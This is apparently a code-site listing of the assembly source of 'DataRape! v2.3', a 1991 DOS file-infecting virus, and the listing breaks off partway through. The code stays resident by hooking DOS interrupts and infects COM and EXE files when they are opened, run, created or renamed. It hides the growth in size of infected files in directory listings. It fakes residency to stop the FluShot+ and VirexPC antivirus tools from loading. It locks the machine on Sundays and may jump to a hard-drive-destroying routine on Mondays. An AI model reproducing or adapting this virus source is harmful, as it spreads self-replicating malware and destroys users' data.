📄 dtarpe23.asm
字号:
@b macro char
mov ah,0eh
mov al,char
int 10h
endm
;---
; DataRape! v2.3 Source Code
;
; Written by Zodiac and Data Disruptor
;
; (C) 1991 RABID International Development Corp
; (Aug.14.91)
;---
;
; Note: Assuming that and infected COMMAND.COM was booted, FSP/VirexPC will
; not be able to go resident under this version of DataRape!
;
;---
code segment
assume cs:code,ds:code,es:code
v: ; All Pre-Resident Offsets Based
; upon this location
startup:
call relative
relative:
pop si
sub si,offset relative
mov bp,si
cld
push ax ;
push es ; Saves registers
push si ;
push ds ;
mov ah,2ah ; Get system time
int 21h
cmp al,0
jne are_we_here_boost
jmp its_sunday
are_we_here_boost:
jmp are_we_here
;---
; If it's Sunday, then we display a message and lock the system
;---
its_sunday:
mov ah,01h
mov cx,2020h
int 10h ;NUL the cursor
mov ah,02h ;Moves the cursor
xor dx,dx
int 10h
xor ax,ax ;Clears the screen
int 10h
@b "I"
@b "t"
@b "'"
@b "s"
@b " "
@b "S"
@b "u"
@b "n"
@b "d"
@b "a"
@b "y"
@b "."
@b " "
@b "W"
@b "h"
@b "y"
@b " "
@b "a"
@b "r"
@b "e"
@b " "
@b "y"
@b "o"
@b "u"
@b " "
@b "w"
@b "o"
@b "r"
@b "k"
@b "i"
@b "n"
@b "g"
@b "?"
@b 13
@b 10
@b "T"
@b "a"
@b "k"
@b "e"
@b " "
@b "t"
@b "h"
@b "e"
@b " "
@b "d"
@b "a"
@b "y"
@b " "
@b "o"
@b "f"
@b "f"
@b " "
@b "c"
@b "o"
@b "m"
@b "p"
@b "l"
@b "i"
@b "m"
@b "e"
@b "n"
@b "t"
@b "s"
@b " "
@b "o"
@b "f"
@b " "
@b "R"
@b "A"
@b "B"
@b "I"
@b "D"
@b 7
im_looped: jmp im_looped
are_we_here:
mov ax,6969h ; Check to see if we are
int 21h ; Allready resident
cmp bx,6969h
je already_here ; Yes? Then leave the program
jmp after_trish
db 13,10,'Patricia Boon',13,10
after_trish:
xor ax,ax ;
mov ds,ax ; Loads Current
les ax,ds:[21h*4] ; Int 21h Vector
mov word ptr cs:[si+save_int_21],ax ;
mov word ptr cs:[si+save_int_21+2],es ;
push cs
pop ds
jmp load_mem
already_here:
pop es ; If, exit
go_go_program: ;
jmp go_program ;
exit_exe:
mov bx,es ;
add bx,10h ; E
add bx,word ptr cs:[si+call_adr+2] ; X
mov word ptr cs:[si+patch+2],bx ; E
mov bx,word ptr cs:[si+call_adr] ;
mov word ptr cs:[si+patch],bx ; E
mov bx,es ; X
add bx,10h ; I
add bx,word ptr cs:[si+stack_pointer+2] ; T
mov ss,bx ; I
mov sp,word ptr cs:[si+stack_pointer] ; N
db 0eah ; G
patch: ;
dd 0 ;
; Below should be changed to:
; exit_com: xor bx,bx
; push bx
; mov di,100h
; push di
; add si,offset my_save
; movsb
; movsw
; ret
exit_com:
mov di,100h ; EXIT
add si,offset my_save ; COM
movsb ;
movsw ;
xor bx,bx ;
push bx ;
jmp [si-11] ;
;---
; Here is where we load ourselves into memory
;---
load_mem:
pop es
mov ah,49h ; Release memory
int 21h
mov bx,0ffffh ; Set memory for FFFFh
; paragraphs
mov ah,48h ; Allocate memory for
; ourselves
int 21h
sub bx,(top_bz+my_bz+1ch-1)/16+2
jc go_go_program
mov cx,es
stc
adc cx,bx
mov ah,4ah ; Modify memory allocation
int 21h
mov bx,(offset top_bz+offset my_bz+1ch-1)/16+1
stc
sbb es:[2],bx
push es
mov es,cx
mov ah,4ah
int 21h
mov ax,es
dec ax
mov ds,ax
mov word ptr ds:[1],8
call mul_16
mov bx,ax
mov cx,dx
pop ds
mov ax,ds
call mul_16
add ax,ds:[6]
adc dx,0
sub ax,bx
sbb dx,cx
jc mem_ok
sub ds:[6],ax ; This section look familiar?
mem_ok:
pop si
push si
push ds
push cs
xor di,di
mov ds,di
lds ax,ds:[27h*4]
mov word ptr cs:[si+save_int_27],ax
mov word ptr cs:[si+save_int_27+2],ds
pop ds
mov cx,offset aux_size
rep movsb
xor ax,ax
mov ds,ax
mov ds:[21h*4],offset int_21
mov ds:[21h*4+2],es
mov ds:[27h*4],offset int_27
mov ds:[27h*4+2],es
mov word ptr es:[filehndl],ax
pop es
go_program:
mov ah,30h ; Get DOS version number
int 21h
cmp al,4 ;
jae check_date ; If >= 4 then check the date
jmp no_fry ; NOT?! Then continue with
; virus
check_date: mov ah,2ah ; Get system time
int 21h
cmp al,1 ; Is it a monday?
je randomizer
jmp no_fry
;---
; If we actually get here, then we have a one in 15 chance that we will fry
; the hard-drive. You may ask yourself, "Why do you go through all the
; trouble?". Easy, because the main priority here is spreading, and not
; fucking up data...
;---
randomizer:
mov ah,2ch ; Get system time
int 21h
and dl,0fh
or dl,dl
jnz no_fry
jmp write_short
no_fry: pop si ; Restore registers
pop ds
pop ax
cmp word ptr cs:[si+my_save],5a4dh ; Is it an EXE file?
jne go_exit_com ; No? Then must be a COM file.
jmp exit_exe ; Yes! Exit an EXE file
go_exit_com:
jmp exit_com
int_27:
pushf ; Allocates Memory,
call alloc ; So TSR can load
popf ;
jmp dword ptr cs:[save_int_27] ;
;---
; This routine will return our ID byte in BX if we are resident.
;---
weare_here:
popf
xor ax,ax
mov bx,6969h ; ID Register
iret
int_21:
push bp
mov bp,sp
push [bp+6]
popf
pop bp ; Set Up Stack
pushf ; Save Flag
cld
cmp ax,6969h
je weare_here
cmp ah,11h ; Hide In
jb not_hide ; Directory
cmp ah,12h ; Listing
ja not_hide ;
fcb_find:
call dword ptr cs:[save_int_21]
push ax
push bx
push ds
push es
pushf
cmp al,0FFh
je done_hide ; Not There?
mov ah,2Fh
int 21h ; Get Size
push es
pop ds
cmp byte ptr es:[bx],0FFh ; Extended FCB?
jne not_extended
add bx,7
not_extended:
mov ax,es:[bx+17h]
and ax,1Fh
cmp ax,1Fh ; Check Time Stamp
;--
; Checking to see if the file is with a 62 seconds filestamp...
;--
jne done_hide ; No? Then the file is not
; infected. Leave it alone...
;--
; If we get here, then we've deduced that the file is indeed infected.
; Therefore, we must reduce the filesize from the DTA in order to show that it
; is "not infected"
;--
sub word ptr es:[bx+1Dh],offset top_file
sbb word ptr es:[bx+1Dh+2],0 ; Decrease Size
;---
; Finished hiding, restore the resigers we saved, and return to the INT
; whence we came from...
;---
done_hide:
popf
pop es
pop ds
pop bx
pop ax
iret
;--
; Function differentiation happens here...
;--
directory:
jmp fcb_find
weare_here_boost:
jmp weare_here
;---
; If FluShot+ or VirexPC are trying to go resident, then tell them that
; we "allready are" resident
;---
fsp_trying:
popf
mov ax,101h ;Set FSP/Virex ID byte
iret
not_hide:
cmp ax,0ff0fh
je fsp_trying
cmp ah,3ch ; Are we creating a file?
je create
cmp ah,3dh ; Open file handle?
je touch
cmp ah,3eh ; Are we closing a file?
je close
cmp ah,43h ; Get/Set file attributes?
je touch
cmp ax,4b00h ; Are we executing a file?
je touch
cmp ax,6969h ; Checking if we are resident?
je weare_here_boost
cmp ah,5bh ; Creating a file?
jne not_create
create:
cmp word ptr cs:[filehndl],0
jne dont_touch
call see_name
jnz dont_touch
call alloc
popf
call function
jc int_exit
pushf
push es
push cs
pop es
push si
push di
push cx
push ax
mov di,offset filehndl
stosw
mov si,dx
mov cx,65
move_name:
lodsb
stosb
test al,al
jz all_ok
loop move_name
mov word ptr es:[filehndl],cx
jmp all_ok
touch:
jmp try_infect
all_ok:
pop ax
pop cx
pop di
pop si
pop es
go_exit:
popf
jnc int_exit
close:
cmp bx,word ptr cs:[filehndl]
jne dont_touch
test bx,bx
jz dont_touch
call alloc
popf
call function
jc int_exit
pushf
push ds
push cs
pop ds
push dx
mov dx,offset filehndl+2
call do_file
mov word ptr cs:[filehndl],0
pop dx
pop ds
jmp go_exit
not_create:
cmp ah,3dh
je touch
cmp ah,43h
je touch
cmp ah,56h
jne dont_touch
try_infect:
call see_name
jnz dont_touch
call do_file
dont_touch:
call alloc
popf
call function
int_exit:
pushf
push ds
call get_chain
mov byte ptr ds:[0],'Z'
pop ds
popf
dummy proc far ; This is absolutely
ret 2 ; needed, IRET
dummy endp ; doesn't cut it
see_name:
push ax
push si
mov si,dx
;--
; Here's a crude yet effective way of scanning the file handle in order to see
; what type of file it is...
;
; (NOTE: We make up for crudeity later by checking the first two bytes of the
; file to see if it is a COM or EXE file (4d5a))
;--
scan_name:
lodsb
test al,al
jz bad_name
cmp al,'.'
jnz scan_name
call get_byte
mov ah,al
call get_byte
cmp ax,'co'
jz pos_com
cmp ax,'ex'
jnz good_name
call get_byte
cmp al,'e'
jmp short good_name
pos_com:
call get_byte
cmp al,'m'
jmp short good_name
bad_name:
inc al
good_name:
pop si
pop ax
ret
get_byte:
lodsb
cmp al,'C'
jc byte_got
cmp al,'Y'
jnc byte_got
add al,20h
byte_got:
ret
function:
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -